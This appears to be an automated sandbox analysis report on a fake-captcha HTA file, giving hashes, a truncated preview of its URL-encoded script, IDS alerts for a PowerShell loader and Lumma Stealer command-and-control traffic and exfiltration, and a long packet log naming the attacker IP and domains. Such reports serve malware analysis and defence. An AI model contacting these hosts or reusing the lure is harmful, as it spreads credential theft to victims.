SHA1:	446F6F0AC1864F691328D3CFE59599598092B401
SHA-256:	630D30FDAC4DAB10DE1AEBBC05D7C1F1E7F544ECB52B5ED6E0D4569C7C1863B6
SHA-512:	E9938D52F2EE350B72D58D5E211464124B39BCC12E700D6C3EB5852219A5A7CFA84D22580F56CCC3E1E1F65521E457FDEB37242A5158AACC0947986B551FC3A6
Malicious:	false
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1482 100 1482 0 0 1069 0 0:00:01 0:00:01 --:--:-- 1072..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (2048), with CRLF line terminators
Entropy (8bit):	3.47135137731597
TrID:
File name:	Captcha.hta
File size:	2'091 bytes
MD5:	c8f045b16d3106cf269965b7fa2485dd
SHA1:	c3e7306fe8290c38b656a6a671e5e889c37f63a5
SHA256:	26eb8e2490888484e79cdd25b87257e5994a3ff084f0f9e54478f843a639c4e3
SHA512:	051d1725836b6e29b1c9b0e6dd191803e1de89c3816e527d77e82f6c43fdc33bc791f3526f246b441c6cc8065540ca0ef1d1de68545d506f16991d99b81443fa
SSDEEP:	24:q0d+2xhlCVKR581JlcwHHR/ubvp+l0Ezn5RJehY63OrFR5b:qaX3lrI3H90vglt5nCPwFn
TLSH:	7341B57C6621CC8EAC337D7BECA87F60D2549F13EDC9A6C4081540463FE1469B5587D9
File Content Preview:	<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%28%66%75%6E%63%74%69%6F

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T07:18:01.761536+0100	2859377	ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)	1	192.168.2.4	49733	147.45.44.131	80	TCP
2024-12-20T07:18:02.605097+0100	2859377	ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)	1	192.168.2.4	49733	147.45.44.131	80	TCP
2024-12-20T07:18:03.910798+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.4	60815	1.1.1.1	53	UDP
2024-12-20T07:18:04.143228+0100	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.4	65307	1.1.1.1	53	UDP
2024-12-20T07:18:05.860092+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:05.860092+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:06.583127+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:06.583127+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:07.813883+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:07.813883+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:08.586491+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:08.586491+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:10.149526+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49739	172.67.197.170	443	TCP
2024-12-20T07:18:10.149526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	172.67.197.170	443	TCP
2024-12-20T07:18:12.632007+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49740	172.67.197.170	443	TCP
2024-12-20T07:18:12.632007+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	172.67.197.170	443	TCP
2024-12-20T07:18:14.764171+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49741	172.67.197.170	443	TCP
2024-12-20T07:18:14.764171+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.197.170	443	TCP
2024-12-20T07:18:17.038616+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49743	172.67.197.170	443	TCP
2024-12-20T07:18:17.038616+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	172.67.197.170	443	TCP
2024-12-20T07:18:17.801318+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49743	172.67.197.170	443	TCP
2024-12-20T07:18:19.432679+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49745	172.67.197.170	443	TCP
2024-12-20T07:18:19.432679+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	172.67.197.170	443	TCP
2024-12-20T07:18:23.912824+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	49750	172.67.197.170	443	TCP
2024-12-20T07:18:23.912824+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49750	172.67.197.170	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 07:17:58.342103958 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:17:58.461867094 CET	80	49730	147.45.44.131	192.168.2.4
Dec 20, 2024 07:17:58.461971045 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:17:58.501565933 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:17:58.621288061 CET	80	49730	147.45.44.131	192.168.2.4
Dec 20, 2024 07:17:59.722228050 CET	80	49730	147.45.44.131	192.168.2.4
Dec 20, 2024 07:17:59.722258091 CET	80	49730	147.45.44.131	192.168.2.4
Dec 20, 2024 07:17:59.722321033 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:17:59.734966993 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:17:59.854877949 CET	80	49730	147.45.44.131	192.168.2.4
Dec 20, 2024 07:17:59.856215954 CET	49730	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:00.379544973 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:00.499385118 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:00.499542952 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:00.499728918 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:00.619345903 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761307955 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761365891 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761403084 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761434078 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761468887 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761504889 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761535883 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.761538029 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761535883 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.761574030 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761579037 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.761606932 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761643887 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.761646032 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.761754990 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.881292105 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.881371021 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.881537914 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.885437965 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.935286045 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.953121901 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.953238964 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.953324080 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.957212925 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.957319975 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.957473993 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.966752052 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.968719959 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.968780041 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.968822002 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.977137089 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.977210999 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.977252007 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.985475063 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.985565901 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.985584021 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.993926048 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:01.994024038 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:01.994062901 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.002321959 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.002407074 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.002427101 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.010740995 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.010801077 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.010837078 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.019876957 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.019917011 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.019980907 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.027543068 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.027678967 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.027745962 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.054950953 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.054990053 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.055042028 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.107137918 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.145294905 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.145360947 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.145602942 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.147614956 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.147747040 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.147808075 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.204627037 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.324654102 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.604983091 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.605022907 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.605097055 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.607239008 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.607342005 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.607409954 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.612140894 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.612215996 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.612282038 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.616997957 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.617129087 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.617227077 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.621804953 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.621920109 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.621988058 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.626636028 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.626745939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.626820087 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.631496906 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.631635904 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.631683111 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.636297941 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.636416912 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.636879921 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.641179085 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.641248941 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.643013000 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.646006107 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.646100998 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.646167994 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.650840998 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.650965929 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.651022911 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.655697107 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.655770063 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.655983925 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.660558939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.660615921 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.661288977 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.665364027 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.665549994 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.665606022 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.670363903 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.670404911 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.671274900 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.675064087 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.675194979 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.676038027 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.679889917 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.679992914 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.680048943 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.684742928 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.684866905 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.685256004 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.689619064 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.689701080 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.689769030 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.694462061 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.694551945 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.694612026 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.699273109 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.699369907 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.699433088 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.704138994 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.704250097 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.706558943 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.709005117 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.709091902 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.709146976 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.713877916 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.713996887 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.714060068 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.724605083 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.778992891 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.797070980 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.797132015 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.797245026 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.799453974 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.799675941 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.799925089 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.804322004 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.804450989 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.804513931 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.809123993 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.809247971 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.809561968 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.813972950 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.814063072 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.814527988 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.818824053 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.818970919 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.819061041 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.823805094 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.823893070 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.824114084 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.828533888 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.828655005 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.828711987 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.833365917 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.833467960 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.833525896 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.838210106 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.838325977 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.838452101 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.843118906 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.843245983 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.843409061 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.848014116 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.848150015 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.848229885 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.852755070 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.852969885 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.853436947 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.857647896 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.857719898 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.857986927 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.861079931 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.861171961 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.861248016 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.864562035 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.864670038 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.864718914 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.868057966 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.868159056 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.868324995 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.871530056 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.871654034 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.871709108 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.875006914 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.875144005 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.875211000 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.878518105 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.878685951 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.878741980 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.882009029 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.882082939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.882508039 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.885493994 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.885600090 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.885658026 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.889020920 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.889074087 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.889130116 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.892498016 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.892628908 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.892688036 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.896018028 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.896127939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.896207094 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.899519920 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.899631977 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.899683952 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.902945995 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.903062105 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.903126001 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.906440020 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.906605959 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.906661987 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.909059048 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.909148932 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.909257889 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.911627054 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.911712885 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.911763906 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.914186001 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.914315939 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.914365053 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.916829109 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.916865110 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.916917086 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.919492006 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.919543028 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.919629097 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.921977043 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.922080040 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.922135115 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.925271034 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.925323963 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.925384045 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.927187920 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.927309036 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.927366018 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.931993008 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.932127953 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.932190895 CET	49733	80	192.168.2.4	147.45.44.131
Dec 20, 2024 07:18:02.934214115 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.934303045 CET	80	49733	147.45.44.131	192.168.2.4
Dec 20, 2024 07:18:02.934473991 CET	49733	80	192.168.2.4	147.45.44.131
